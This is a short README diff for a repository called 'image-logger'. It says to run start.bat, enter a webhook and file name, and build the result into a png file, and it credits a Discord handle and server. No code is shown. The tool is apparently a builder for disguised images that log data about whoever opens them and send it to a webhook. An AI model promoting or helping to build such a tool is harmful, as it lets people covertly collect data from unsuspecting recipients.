ChaosLFR/image-logger/README.md

 Simply Run start.bat

-It will ask you for webhook and file name and build
+It will ask you for webhook and file name and build, after which it will build into a png file
 # Creds
 escrow#0001
 https://discord.gg/comps